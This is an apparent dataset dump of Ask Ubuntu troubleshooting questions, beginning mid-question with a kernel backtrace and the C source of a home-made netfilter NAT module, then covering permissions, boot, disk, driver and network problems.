__cond_resched+0x2a/0x40 [ 15325.351320 ] [ < ffffffff8169d172 > ] _cond_resched+0x32/0x40 [ 15325.351324 ] [ < ffffffff81174bfd > ] kmem_cache_alloc_trace+0x12d/0x150 [ 15325.351333 ] [ < ffffffff81685749 > ] ? printk+0x61/0x63 [ 15325.351335 ] [ < ffffffffa03be139 > ] allocnew+0x29/0x30 [ nat ] [ 15325.351351 ] [ < ffffffffa03be2c2 > ] netfilter_local_out_hook+0x182/0x220 [ nat ] [ 15325.351360 ] [ < ffffffff815acea5 > ] nf_iterate+0x85/0xc0 [ 15325.351370 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15325.351377 ] [ < ffffffff815acf55 > ] nf_hook_slow+0x75/0x150 [ 15325.351384 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15325.351393 ] [ < ffffffff815b9b22 > ] __ip_local_out+0xa2/0xb0 [ 15325.351401 ] [ < ffffffff815b9b46 > ] ip_local_out+0x16/0x30 [ 15325.351409 ] [ < ffffffff815b9cb6 > ] ip_queue_xmit+0x156/0x400 [ 15325.351417 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.351425 ] [ < ffffffff815d27ad > ] tcp_transmit_skb+0x37d/0x5d0 [ 15325.351434 ] [ < ffffffff815d34dd > ] tcp_retransmit_skb+0x12d/0x360 [ 15325.351439 ] [ < ffffffff815d540b > ] tcp_retransmit_timer+0x20b/0x460 [ 15325.351445 ] [ < ffffffff815d5748 > ] tcp_write_timer+0xe8/0x110 [ 15325.351451 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.351460 ] [ < ffffffff81062efb > ] call_timer_fn+0x3b/0x150 [ 15325.351466 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.351473 ] [ < ffffffff81064842 > ] run_timer_softirq+0x132/0x2a0 [ 15325.351483 ] [ < ffffffff810a4515 > ] ? ktime_get+0x65/0xe0 [ 15325.351493 ] [ < ffffffff8105bc78 > ] __do_softirq+0xa8/0x210 [ 15325.351501 ] [ < ffffffff810ab694 > ] ? tick_program_event+0x24/0x30 [ 15325.351509 ] [ < ffffffff816a7f9c > ] call_softirq+0x1c/0x30 [ 15325.351520 ] [ < ffffffff81016235 > ] do_softirq+0x65/0xa0 [ 15325.351527 ] [ < ffffffff8105c05e > ] irq_exit+0x8e/0xb0 [ 15325.351535 ] [ < ffffffff816a88fe > ] smp_apic_timer_interrupt+0x6e/0x99 [ 15325.351545 ] [ < ffffffff816a764a > ] apic_timer_interrupt+0x6a/0x70 [ 15325.351548 ] < eoi > [ < ffffffff8139ae1a > ] ? intel_idle+0xea/0x150 [ 15325.351562 ] [ < ffffffff8139adfc > ] ? intel_idle+0xcc/0x150 [ 15325.351572 ] [ < ffffffff81534559 > ] cpuidle_enter+0x19/0x20 [ 15325.351578 ] [ < ffffffff81534b7c > ] cpuidle_idle_call+0xac/0x2a0 [ 15325.351586 ] [ < ffffffff8101d83f > ] cpu_idle+0xcf/0x120 [ 15325.351595 ] [ < ffffffff8167af3d > ] start_secondary+0xc3/0xc5 [ 15325.351626 ] added new session : 53142 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.351630 ] tcp packet : 53142 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.351634 ] success out [ 15325.487039 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15325.487049 ] success out [ 15326.277299 ] tcp packet : 80 , 36918 , 10.201.13.50 , 10.42.0.25 [ 15326.277309 ] no matching session found . [ 15326.277334 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15326.277338 ] success out [ 15326.625783 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15326.625794 ] success out [ 15328.899284 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15328.899294 ] success out [ 15333.454294 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15333.454305 ] success out in the above log , nat is our module and allocnew is a function in it which uses kmalloc to allocate memory for a linked list which stores the translation lookup info . any insight would be of great help . thanks . the c code nat.c is as follows : # include < linux/kernel.h > # include < linux/module.h > # include < linux/slab.h > # include < linux/tcp.h > # include < net/tcp.h > # include < linux/skbuff.h > # include < linux/list.h > # include < linux/ip.h > # include < linux/netfilter.h > # include < linux/netfilter_ipv4.h > typedef struct sess { unsigned src_ip , dst_ip , src_port , mappd_port , dst_port ; struct list_head list ; } session ; session* allocnew ( void ) { return ( session* ) kzalloc ( sizeof ( session ) , gfp_kernel ) ; } void freelist ( session *node ) { session *temp , *temp1 ; printk ( kern_info `` > > > > sessions patted by nat module : < < < < \n '' ) ; list_for_each_entry_safe ( temp , temp1 , & node- > list , list ) { printk ( kern_info `` > > > % u < - > % u , % u , % pi4 , % pi4\n '' , temp- > src_port , temp- > mappd_port , temp- > dst_port , & temp- > src_ip , & temp- > dst_ip ) ; list_del ( & temp- > list ) ; kfree ( temp ) ; } } unsigned natports=3000 ; session *head=null ; struct nf_hook_ops nfhookopsin , nfhookopsout ; unsigned int netfilter_local_in_hook ( unsigned int hooknum , struct sk_buff *skb , const struct net_device *in , const struct net_device *out , int ( *okfn ) ( struct sk_buff * ) ) { unsigned src_ip , dst_ip , src_port , dst_port ; struct iphdr *ip_head ; struct tcphdr *tcp_head ; session *temp=null ; ip_head = ( struct iphdr * ) skb_network_header ( skb ) ; src_ip = ip_head- > saddr ; dst_ip = ip_head- > daddr ; if ( ip_head- > protocol == 6 ) { tcp_head = ( struct tcphdr * ) ( ( char* ) ip_head+4* ( unsigned ) ip_head- > ihl ) ; // tcp_head = ( struct tcphdr * ) skb_transport_header ( skb ) ; src_port = ( unsigned ) ntohs ( tcp_head- > source ) ; dst_port = ( unsigned ) ntohs ( tcp_head- > dest ) ; printk ( kern_info `` tcp packet : % u , % u , % pi4 , % pi4\n '' , src_port , dst_port , & src_ip , & dst_ip ) ; } else return nf_accept ; list_for_each_entry ( temp , & head- > list , list ) { if ( temp- > src_ip == dst_ip & & temp- > dst_ip == src_ip & & temp- > mappd_port == dst_port & & temp- > dst_port == src_port ) { tcp_head- > dest= ( __be16 ) htons ( temp- > src_port ) ; printk ( kern_info `` success in\n '' ) ; return nf_accept ; // break ; } } printk ( kern_info `` no matching session found . `` ) ; return nf_accept ; } unsigned int netfilter_local_out_hook ( unsigned int hooknum , struct sk_buff *skb , const struct net_device *in , const struct net_device *out , int ( *okfn ) ( struct sk_buff * ) ) { unsigned src_ip , dst_ip , src_port , dst_port ; struct iphdr *ip_head ; struct tcphdr *tcp_head ; session *temp=null ; unsigned char found=0 ; ip_head = ( struct iphdr * ) skb_network_header ( skb ) ; src_ip = ip_head- > saddr ; dst_ip = ip_head- > daddr ; if ( ip_head- > protocol == 6 ) { tcp_head = ( struct tcphdr * ) ( ( char* ) ip_head+4* ( unsigned ) ip_head- > ihl ) ; // tcp_head = ( struct tcphdr * ) skb_transport_header ( skb ) ; src_port = ( unsigned ) ntohs ( tcp_head- > source ) ; dst_port = ( unsigned ) ntohs ( tcp_head- > dest ) ; printk ( kern_info `` tcp packet : % u , % u , % pi4 , % pi4\n '' , src_port , dst_port , & src_ip , & dst_ip ) ; } else return nf_accept ; found=0 ; list_for_each_entry ( temp , & head- > list , list ) { if ( temp- > src_ip == src_ip & & temp- > dst_ip == dst_ip & & temp- > src_port == src_port & & temp- > dst_port == dst_port ) { unsigned tcplen=skb- > len-4* ( unsigned ) ip_head- > ihl ; tcp_head- > source= ( __be16 ) htons ( temp- > mappd_port ) ; if ( skb_is_nonlinear ( skb ) ) skb_linearize ( skb ) ; tcp_head- > check= ( __sum16 ) 0 ; tcp_head- > check = tcp_v4_check ( tcplen , ip_head- > saddr , ip_head- > daddr , csum_partial ( ( char* ) tcp_head , tcplen,0 ) ) ; skb- > ip_summed=checksum_none ; // ip_head- > check= ( __sum16 ) 0 ; printk ( kern_info `` success out\n '' ) ; // found=1 ; return nf_accept ; // break ; } } if ( found==0 ) { session *new = allocnew ( ) ; if ( new == null ) { printk ( kern_info `` could not allocate memory for new session : % u , % u , % pi4 , % pi4\n '' , src_port , dst_port , & src_ip , & dst_ip ) ; return nf_accept ; } new- > src_ip = src_ip ; new- > dst_ip = dst_ip ; new- > src_port = src_port ; new- > mappd_port=natports++ ; new- > dst_port = dst_port ; init_list_head ( & new- > list ) ; list_add_tail ( & new- > list , & head- > list ) ; printk ( kern_info `` added new session : % u , % u , % pi4 , % pi4\n '' , src_port , dst_port , & src_ip , & dst_ip ) ; return nf_repeat ; } printk ( kern_info `` some exception ! ! ! `` ) ; return nf_accept ; } int init_module ( ) { printk ( kern_info `` kernel module loaded\n '' ) ; nfhookopsin.hook = netfilter_local_in_hook ; nfhookopsin.hooknum = nf_inet_local_in ; nfhookopsin.pf = pf_inet ; nfhookopsin.priority = nf_ip_pri_first ; nfhookopsin.owner = this_module ; nf_register_hook ( & nfhookopsin ) ; nfhookopsout.hook = netfilter_local_out_hook ; nfhookopsout.hooknum = nf_inet_local_out ; nfhookopsout.pf = pf_inet ; nfhookopsout.priority = nf_ip_pri_first ; nfhookopsout.owner = this_module ; nf_register_hook ( & nfhookopsout ) ; if ( head==null ) { head = allocnew ( ) ; init_list_head ( & head- > list ) ; } return 0 ; } void cleanup_module ( ) { freelist ( head ) ; nf_unregister_hook ( & nfhookopsin ) ; nf_unregister_hook ( & nfhookopsout ) ; printk ( kern_info `` module unloaded\n '' ) ; }
354023	apache permissions issue	i have changed my documentroot to /home/user/www . to achieve that i have just changed the 2 occurrences of the path at /etc/apache2/sites-available/default . the permissions of /home/user/www are 0774 . i have added the www-data user to my user 's group and the owner of /home/user/www is my own user and group ( user : user ) . the problem is that apache ca n't write to this directory . it can write only if i set www-data as owner , but if i do that , i ca n't write at the directory .
354026	ri ca n't find the update manager or the software manager , can any help ?	i 've tried searching for both the update manager and the software manager and all i can find is the synaptic package manager , which wont help me update to 13.04 of ubuntu . i 've tried looking around but they 're nowhere to be seen . i 'm using version 12.10 of ubuntu . edit : i also can not do any shortcut commands for some reason other than copy , paste , and those . the `` windows key '' does nothing as well as ctrl-alt-t . i replaced the update-manager with software-manager and it ran ! thank you !
354027	screensaver script	i 'm using ubuntu 12.04 lts 64bit . i need to write a script which would automatically add some images from a ftp server , and the screensaver would run a slideshow of these . any suggestions or help will be highly appreciated .
354029	ca n't read/write on hard disk	i recently installed two hard disks into my system , i formatted them as ext4 , but i ca n't read/write them ! the properties show that the owner is `` root '' . i named the hard disks `` hard disk 1 '' and `` hard disk 2 '' . how can i change the ownership to my user ( daniel ) , so i can edit/create/delete/read files ?
354030	why my ubuntu-13.04-desktop-i386 can`t work ?	i have installed the ubuntu-13.04-desktop in my computer use wubi , but when i import my password , the screen can`t show anything ,
354031	ubuntu 13.04 freezing at startup	i have installed a dual boot system on an uefi board with windows 7 and ubuntu 13.04 ( both 64bit ) . ubuntu is freezing during bootup very often . in most of the cases it 's stuck on a blank orange background - but sometimes it 's also freezing during the ubuntu logo ( with those `` loading dots '' ) . occasionally , it ends up showing a console with strange codes like `` ( [ [ 2663 '' . the only thing i can do then is pressing the reset button and trying again - there is a very small chance that the boot process succeeds showing me the login screen . if i want to shut down or restart system ( assumed i managed it to start ubuntu ) , this does not work either . there is no signal on my screen anymore , but the pc keeps running and i have to restart / switch it off manually . all of the problems mentioned above are appearing on ubuntu only , while windows 7 is able to boot , restart and shut down perfectly . it might be important to know that i 'm using a 128 gb ssd drive . i 've read about a connection between the usage of ssds and ubuntu boot difficulties , but as those questions have been asked already one or two years ago , i can not believe that there is still no solution available . am i wrong ? other hardware used in my system : gigabyte h87-hd3 geforce gtx 760 logitech g19 gaming keyboard intel i5 processor thanks for answers !
354032	ubuntu 13.04 network connection is no more	i ' using ubuntu 13.04 . two days ago i had a problem with the connectivity of the wifi . i followed these instructions '' ... now download the latest networkmanager , in case you need to reinstall it if wicd does n't work sudo apt-get install -d -- reinstall network-manager network-manager-gnome then to install it sudo apt-get install wicd-gtk and now you need to uninstall networkmanager : sudo apt-get remove -- purge network-manager-gnome network-manager . now you can find wicd in your menu start wicd , find the network you want to use and enter the information needed , password , encryption , etcetera and choose automatically connect to this network . you should be good to go ! '' but when i tried to connect to wicd : `` could not connect to wicd 's d-bus interface . check the wicd log for error messages '' and upon checking with system testing report i found this `` error : root : could not find def gateway info in /proc '' and `` error : root : could not find default gateway by running route '' lastly when i removed wicd-gtk and installed network-manager-gnome network-manager and tried to run `` network '' in the settings , it again says `` the system network services are not compatible with this version '' can you help ?
354033	13.04 brightness on thinkpad t430	can not adjust brightness on my thinkpad t430 . this does n't work anymore : ubuntu 10.04 cant adjust brightness on my lenovo thinkpad ? is there another way to fix this ?
354038	raid drives are missing filesystem	i recently had to do some troubleshooting with a raid 5 on ubuntu server ( a software raid ) . i ended up removing everything and start from scratch with 2 new drives . so i took out 2 out of 4 drives , replaced them with 2 new drives redid the raid , formatted the raid etc . but i think i forgot something , cause when i do sudo parted -l i get this : model : ata wdc wd20efrx-68a ( scsi ) disk /dev/sdb : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 2000gb 2000gb primary ext4 raid model : ata wdc wd20efrx-68a ( scsi ) disk /dev/sdc : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 2000gb 2000gb primary ext4 raid model : ata st2000vn000-1h31 ( scsi ) disk /dev/sdd : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 2000gb 2000gb primary raid model : ata st2000vn000-1h31 ( scsi ) disk /dev/sde : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 2000gb 2000gb primary raid model : linux software raid array ( md ) disk /dev/md0 : 6001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 17.4kb 6001gb 6001gb ext4 two of the drives have filessytem ext4 and the other two have no filesystem . the raid is currently resyncing and i ca n't stop it . how do i give the other two new drives a filesystem ? because when i try to mount the raid it says that it 's the wrong filesystem specfied or a bad superblock . it 's a clean slate so it i do n't care about the data on the disks .
354041	how do i recover unsaved files in gimp ?	i was working in gimp on a cover for my new book and before i could finish it my computer crash and i lost all my info is there anyway for me to undo my computers history and retrieve my info ?
354042	dual boot is unsuccesful - boot repair not solved the issue	i have installed ubuntu 12.04 ( 32bit ) on my pc . windows xp installation is also present on the same hard drive , so my aim is to configure a dual boot system . currently none of the 2 operating systems are loaded , i get the following error message from grub rescue : error : unknown filesystem i have already used the boot repair utility to solve this issue , but the situation is not changed . report : http : //paste.ubuntu.com/6170492/ i have installed winxp on sda1 and ubuntu on sda4 could you check what is the problem here ? thank you in advance , zoltan
354043	brightness controls not working for ubuntu 13.04	screen brightness is diminished for ubuntu 13.04 . started yesterday and using ubuntu brightness settings is not working . computer also has other operating system and brightness is not affected . is this a virus or just a systems problem ? any help would be greatly appreciated
354045	glib_gsettings not found while compiling gnome extension	having failed to install a gnome extension from the website i looked for another way . the guide i found on google was like : sudo apt-get install gnome-common git clone git : //git.gnome.org/gnome-shell-extensions cd gnome-shell-extensions ./autogen.sh -- prefix= $ home/.local -- enable-extensions= '' drop-down-terminal '' the last command failed though with the following error : ./configure : line 4276 : glib_gsettings : command not found configure : error : invalid extension drop-down-terminal unfortunately i did n't find anything helpful on google . any suggestion ? thanks .
354047	since automatic update on ubuntu 13.04 , problem loading nvidia kernel module	since an automatic update which add x server ( xorg ) , problem on loading nvidia kernel module appears . before xorg does n't appear in current process , that 's why conclude that xorg had been added . here is the /varâlog/xorg.0.log : [ 4931.982 ] module class : x.org video driver [ 4931.986 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 4931.986 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 4932.785 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) here is my graphic card : $ lspci| grep vga 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 320m ] ( rev a2 ) dmesg : whole file here ... [ 20.883670 ] ppdev : user-space parallel port driver [ 21.190115 ] init : nvidia-persistenced main process ( 1257 ) terminated with status 1 [ 22.037723 ] r8169 0000:03:00.0 eth0 : link down [ 22.037777 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 22.038057 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 23.797388 ] bridge firewalling registered [ 24.159079 ] ip_tables : ( c ) 2000-2006 netfilter core team [ 24.372053 ] nf_conntrack version 0.5.0 ( 16384 buckets , 65536 max ) [ 24.583618 ] ipv6 : addrconf ( netdev_up ) : virbr0 : link is not ready [ 25.197600 ] ebtables v2.0 registered [ 25.252503 ] ip6_tables : ( c ) 2000-2006 netfilter core team [ 25.271254 ] cgroup : libvirtd ( 1470 ) created nested cgroup for controller `` memory '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 25.271263 ] cgroup : `` memory '' requires setting use_hierarchy to 1 on the root . [ 25.271301 ] cgroup : libvirtd ( 1470 ) created nested cgroup for controller `` devices '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 25.271349 ] cgroup : libvirtd ( 1470 ) created nested cgroup for controller `` blkio '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 77.508828 ] vesafb : mode is 640x480x32 , linelength=2560 , pages=0 [ 77.508836 ] vesafb : scrolling : redraw [ 77.508840 ] vesafb : truecolor : size=8:8:8:8 , shift=24:16:8:0 [ 77.513310 ] vesafb : framebuffer at 0xd1000000 , mapped to 0xffffc90010d80000 , using 1216k , total 1216k [ 77.513465 ] console : switching to colour frame buffer device 80x30 [ 77.514707 ] fb0 : vesa vga frame buffer device [ 167.689216 ] net_ratelimit : 14 callbacks suppressed [ 167.689267 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 167.689333 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 167.689436 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 167.690565 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 168.492108 ] cfg80211 : calling crda to update world regulatory domain [ 168.496662 ] cfg80211 : world regulatory domain updated : [ 168.497392 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 168.498869 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) is it possible to solve this issue ? thanks
354050	installed ubuntu using wubi to windows 8 by accident , how do i remove ?	i installed unbutu using wubi on windows 8 with efi bios . i now realise i should not have done that . i have partioned my d drive and installed unbuntu using a usb drive as explained on here , but when i turn on my computer the blue screen asks me to choose windows 8 or unbuntu . if i choose ubuntu i get this error message windows failed to start followed by file : \unbuntu\winboot\wubildr.mbr status : oxc000000f i assume my second install on the d drive is being stopped by my first using wubi is this correct and how do i rectify it . i need ubuntu for college so i am under some pressure . thank you for your help ,
354051	trouble installing ubuntu touch on nexus 4	i have a nexus 4 for testing purpose only . today i decided to do a full wipe and install last image , so i did ( i removed some uninteresting lines ) : rpadovani @ artemis : ~ $ phablet-flash ubuntu-system -- channel devel -- no-backup info : phablet-flash : waiting for recovery image to boot info : phablet-flash : wait for recovery image to boot complete info : phablet-flash : clearing /data and /cache info : phablet-flash : pushing /home/rpadovani/downloads/phablet-flash/imageupdates/pool/ubuntu-d36f505e94afc8990c57f31db9812b5ee7466a155768388da3fdec5f8393867d.tar.xz to /cache/recovery/ protocol failure error : phablet-flash : command 'adb push /home/rpadovani/downloads/phablet-flash/imageupdates/pool/ubuntu-d36f505e94afc8990c57f31db9812b5ee7466a155768388da3fdec5f8393867d.tar.xz /cache/recovery/ ' returned non-zero exit status 1 removing directory /tmp/tmp3pxqhs removing directory /tmp/tmpy58jgt when it reboot it is stuck on the screen with the text `` google '' . after ten minutes i tried to reflash it , but it said : rpadovani @ artemis : ~ $ phablet-flash ubuntu-system -- channel devel -- no-backup error : device not found error : phablet-flash : command 'adb shell getprop ro.cm.device ' returned non-zero exit status 255 so i restore default android version , but i have the same error when i try to reflash ubuntu . what can i do ?
354053	how to apply this theme ?	how do i apply it ? i do n't see any instructions , and i 've never applied a theme from a .zip file before . using ubuntu 13.04 http : //gnome-look.org/content/show.php/delorean-dark-stripped-themes-3.8 ? content=160985
354054	count internet data usage in ubuntu	i am using a broadband connection which provides me greater speed with limited usage as 2.5 gb per month . i want some application which can help me by counting my data up/down volumes everyday , so that i can control my usage & stop getting extra bill for over usage . is there any application like that ?
354059	i want to intall ubuntu alongside window 8	i was trying to install ubuntu desktop with with window 8 but unfortunately for me i can find my windows anymore which contain a lot of my personnel stuffs almost 1tirabyte . please help me
354060	problem in installing vim editor	when i tried to open a file by using the following command vim file1.c the following message is displayed . the program 'vim ' can be found in the following packages : *vim *vim-gnome *vim-tiny *vim-gtk *vim-nox try : sudo apt-get install < selected package > so i tried to install vim editor by using vim-gnome package but the following message is displayed . package vim-gnome is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim-gnome ' has no installation candidate i tried with each of the above packages but the similar message is displayed . please help me to resolve this problem ...
354064	nfs share unable to write	i 'm having some nfs write permission problems . on the server : /tank 192.168.1.0/24 ( rw , fsid=1 , nohide , sync , no_subtree_check , no_root_squash ) /tank/pictures 192.168.1.0/24 ( rw , fsid=2 , nohide , sync , no_subtree_check , no_root_squash ) the permissions on the export set recursively are : drwxrwxr-x root fsshare fsshare is a group on server/client guid : =500 . i do n't want to give 777 access . i only want members of that group and root writing to that folder . 777 does work to allow write access . on the server/client the user is part of that group . both server/client have that user with uid : =1000 on the client /etc/fstab contains 192.168.1.138 : /tank /mnt/tank nfs rw , noatime , tcp 0 0 the share mounts as nfs version 4 . i 'm using nfs-utils 1.2.8-ubuntu2 any help would be appreciated .
354066	installing ubuntu on a second non-empty drive	my computer has a small ssd and a large regular hdd . i 've got windows on the ssd , and i 've managed to take up nearly the whole thing , so i 'd like to install ubuntu on my larger hdd where i currently store my data . i 've tried running the 12.10 installer from a live usb , but it does n't seem to see the 'empty space ' partition of the second hard drive - it just shows up with one massive /dev/sdb partition . i do n't want to install to this in case it wipes my data out . this is what my system looks like in windows 7 's partition editor . how do i get ubuntu to notice the empty space in the second drive ? since posting this , i merged the 'unused space ' in the h : drive back into the allocated space , so it 's now just one big partition . when i boot into ubuntu , a disk icon shows up in the explorer labeled data , but when i try to open it , i get a popup with this : error mounting /dev/sdb2 at /media/daniel/data : command-line `mount -t `` ntfs '' -o '' uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' '' /dev/sdb2 '' `` /media/daniel/data '' ' exited with non-zero exit status 12 : failed to read last sector ( 1953514191 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdb2 ' : invalid argument the device '/dev/sdb2 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? here 's some command output that may help : daniel @ daniel-ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb25702d7 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 101315360 50554256+ 7 hpfs/ntfs/exfat /dev/sda3 101316606 117229567 7956481 5 extended /dev/sda5 113231872 117229567 1998848 82 linux swap / solaris /dev/sda6 101316608 113231871 5957632 83 linux partition table entries are not in disk order disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 240 heads , 63 sectors/track , 129201 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3fa2eb82 device boot start end blocks id system /dev/sdb1 63 1953523119 976761528+ 42 sfs and : daniel @ daniel-ubuntu : ~ $ sudo parted -l model : ata intel ssdsc2ct06 ( scsi ) disk /dev/sda : 60.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 51.9gb 51.8gb primary ntfs 3 51.9gb 60.0gb 8147mb extended 6 51.9gb 58.0gb 6101mb logical ext4 5 58.0gb 60.0gb 2047mb logical linux-swap ( v1 ) model : ata samsung hd103sj ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 1000gb 1000gb primary warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
354069	ssh : write failed : broken pipe error	i connect with my work pc using ssh . it was working fine until recently but now suddenly connection gets lost with error `` write failed : broken pipe `` error on terminal . i saw similar question somewhere and it was suggested to add `` serveraliveinterval 120 '' line in ssh_config file . it does n't work and i am facing same error again .
354073	lightdm is stuck in login loop , fixed when i restart lightdm	i am trying to get lightdm to automatically log me in i have managed to get it so that lightdm no longer asks for my password . however there is still an issue . after booting up the computer the login screen is still displayed . if i click log in then the screen flashes black and i am returned to the login screen . however tying sudo service lightdm restart causes xbmc to auto login . so progress . however this means i need to restart lightdm every time i boot up which is not ideal . i have tried the fixes listed here already : http : //askubuntu.com/questions/12924 ... ord-is-correct
354074	problem on java : not found	initializing installscape using jvm at /home/manoj/iscap/iscape/runtime/lnx86/bin/java . this might take some time ... /home/manoj/iscap/iscape/bin/iscape.sh : 209 : exec : /home/manoj/iscap/iscape/runtime/lnx86/bin/java : not found # # iam trying to install ic610 cadence.. but during iscape installation i got this error.. my installation goes to terminate.. i also installed jdk ... manoj @ greenchip : ~ $ sudo sh /home/manoj/ic610/ic610_lnx86.base/cdrom1/setup.sh sudo : unable to resolve host greenchip copyright 1985-2006 by cadence design systems inc . licensed software - reverse assembly , reverse compilation and reverse engineering prohibited . the information contained in this package is the proprietary property of cadence design systems , inc. , or its licensors , and may only be used in accordance with the cadence design systems license agreement under which this package is provided . restricted rights notice to government users use duplication or disclosure by the government is subject to the restrictions as set forth in subparagraphs ( c ) ( 1 ) ( ii ) of the rights in technical data and computer software clause at dfars 252.227-7013 . unpublished - all rights reserved under the copyright laws of the united states . cadence design systems , inc. 555 river oaks parkway san jose , california 95134 usa located cdrom at /home/manoj/ic610/ic610_lnx86.base/cdrom1 specify path of install directory [ or type [ return ] to exit ] : /cadence detecting installscape for lnx86 ... checking installscape on media ... could not detect an installscape for lnx86 platform using the path environment variable it is a good idea to have only one installation of installscape for lnx86 platform . if an installscape installation exists please help us find it . do you have installscape for lnx86 platform installed somewhere [ y/n ] ? n you are on lnx86 platform installscape version 03.40.p06 for platform lnx86 is available on this cd . do you want to install installscape for lnx86 [ y/n ] : /iscape please press y ( yes ) or n ( no ) : y it is recommended that you install installscape outside the cadence installation hierarchy and include the ~iscape/bin in your path environment variable . type the path to installscape installation directory [ ( q to quit ) ] : /iscape installscape installation directory : /iscape extracting installscape version 03.40.p06 for platform lnx86 in /iscape starting up installscape in gui mode display environment variable is set to :0.0 if you do not see the installscape console window or the it seems to be hanging then kill this process . set your display environment variable to a proper value and manually start installscape by typing : /iscape/iscape/bin/iscape.sh /home/manoj/ic610/ic610_lnx86.base/cdrom1 : : : /cadence initializing installscape using jvm at /iscape/iscape/runtime/lnx86/bin/java . this might take some time ... /iscape/iscape/bin/iscape.sh : 209 : exec : /iscape/iscape/runtime/lnx86/bin/java : not found manoj @ greenchip : ~ $ system config : using wubi installer 25gb allocated for ubuntu . 4gbram software config : ubuntu 12.04
354079	ubuntu 13.04 instalation error	i was trying to install ubuntu 13.04 as multi boot with windows xp , but i keep getting the error `` no root file system found '' i intend to install ubuntu in a different partition as windows xp . what does that error mean and what should i do ?
354080	login screen wallpaper does n't match user background when not using default wallpaper ?	lightdm login screen match my desktop background only when i 'm using default ubuntu wallpaper from system settings , but whenever using random image files from nautilus and do right-click then set as wallpaper , i get my desktop background but login screen change back to that orange-purple ( and ugly ) wallpaper , something is definitely wrong , please help .
354081	unity webapps api not available on load in chromium	i have my website setting up the unity webapp integration on load . in contrast to firefox , chromium has n't the api available immediately after loading the page . is there any best practice how to wait for the api to become available or should i just recheck after a couple of seconds ?
354084	broken grub on lubuntu usb ( 13.04 )	i have a 32gb lubuntu live usb , it works prefect and the 32gb is enough for my own little system in the background . it means i can plug it into any machine and instantly have my programs etc . worked perfect until i had an install on a windows 8/lubuntu 13.04 machine i tried to fix . the problem was the grub was missing , so i used my usb as a live disk to fix . it promptly as expected fixed the broken machine . however now my usb is looking for the hdd of that machine and no longer works as a system in its own right . how can i fix this , i can see all the files using another linux machine but can not boot the usb . any ideas much appreciated
